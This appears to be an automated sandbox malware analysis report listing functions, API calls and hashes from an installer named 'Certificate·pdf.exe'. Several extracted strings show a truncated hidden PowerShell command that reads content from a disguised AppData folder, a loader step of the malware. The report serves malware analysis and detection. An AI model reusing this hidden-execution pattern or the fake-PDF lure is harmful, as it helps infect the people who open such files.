Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
Opcode Fuzzy Hash: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29

Function 0040425A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D

Function 00404243 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09

Function 00403324 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19

Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004052FF: lstrlenW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00000000,00790DA9,771423A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
Part of subcall function 004052FF: lstrcatW.KERNEL32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,00403257), ref: 0040535A
Part of subcall function 004052FF: SetWindowTextW.USER32(Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il), ref: 0040536C
Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

Part of subcall function 00405880: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
Part of subcall function 00405880: CloseHandle.KERNEL32(?), ref: 004058B6

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F4D

Part of subcall function 00406722: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F01,?,?,?,?,?,?), ref: 00406733
Part of subcall function 00406722: GetExitCodeProcess.KERNEL32(?,?), ref: 00406755

Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
Instruction ID: 1848912924f12909307f0f16d051c5eef0c325367a6f8932b55625d14ee19b35
Opcode Fuzzy Hash: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
Instruction Fuzzy Hash: 96F09032906021DBCB20FBA19D845DF76A4EF40358B2441BBF902B61D1CB7C4E519BAE

Function 004038AD Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,004036E0,00000006,?,00000006,00000008,0000000A), ref: 004038B8

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8461db2c02680890d368972fb338d1f1877edd2f058d59b4848caffe6b4250ca
Instruction ID: fee85902db54b6f44904e23b6ce20f3966c5b76a7b945246d4899a6689ebb1f0
Opcode Fuzzy Hash: 8461db2c02680890d368972fb338d1f1877edd2f058d59b4848caffe6b4250ca
Instruction Fuzzy Hash: 9BC0127150070496C5247F759D4FA453A946B41735BA08775B0F9F00F0CB3C5659555A

Non-executed Functions

Function 00404C7B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C93
GetDlgItem.USER32(?,00000408), ref: 00404C9E
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
LoadBitmapW.USER32(0000006E), ref: 00404CFB
SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
DeleteObject.GDI32(00000000), ref: 00404D71
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
ShowWindow.USER32(?,00000005), ref: 00404ECB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
ImageList_Destroy.COMCTL32(00000000), ref: 0040509B
GlobalFree.KERNEL32(00000000), ref: 004050AB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
ShowWindow.USER32(?,00000000), ref: 0040524A
GetDlgItem.USER32(?,000003FE), ref: 00405255
ShowWindow.USER32(00000000), ref: 0040525C

Strings

M, xrefs: 00404E25
N, xrefs: 00404F06
, xrefs: 00405234

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58

Function 004046FF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040474E
SetWindowTextW.USER32(00000000,?), ref: 00404778
SHBrowseForFolderW.SHELL32(?), ref: 00404829
CoTaskMemFree.OLE32(00000000), ref: 00404834
lstrcmpiW.KERNEL32(Execute: ,007A1F20,00000000,?,?), ref: 00404866
lstrcatW.KERNEL32(?,Execute: ), ref: 00404872
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884

Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4

Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00403347,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5

GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962

Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78

Strings

Execute: , xrefs: 00404860, 00404865, 00404870
C:\Users\user\AppData\Local\Skamflelsens\fameless, xrefs: 0040484F
A, xrefs: 00404822

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Skamflelsens\fameless$Execute:
API String ID: 2624150263-3281777397
Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D

Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 004059D2
lstrcatW.KERNEL32(007A3F28,\*.*), ref: 00405A1A
lstrcatW.KERNEL32(?,0040A014), ref: 00405A3D
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405A43
FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405A53
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
FindClose.KERNEL32(00000000), ref: 00405B02

Strings

(?z, xrefs: 00405A02
\*.*, xrefs: 00405A14
C:\Users\user\AppData\Local\Temp\, xrefs: 004059B7
"C:\Users\user\Desktop\Certificate#U00b7pdf.exe", xrefs: 004059A9

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3342576968
Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
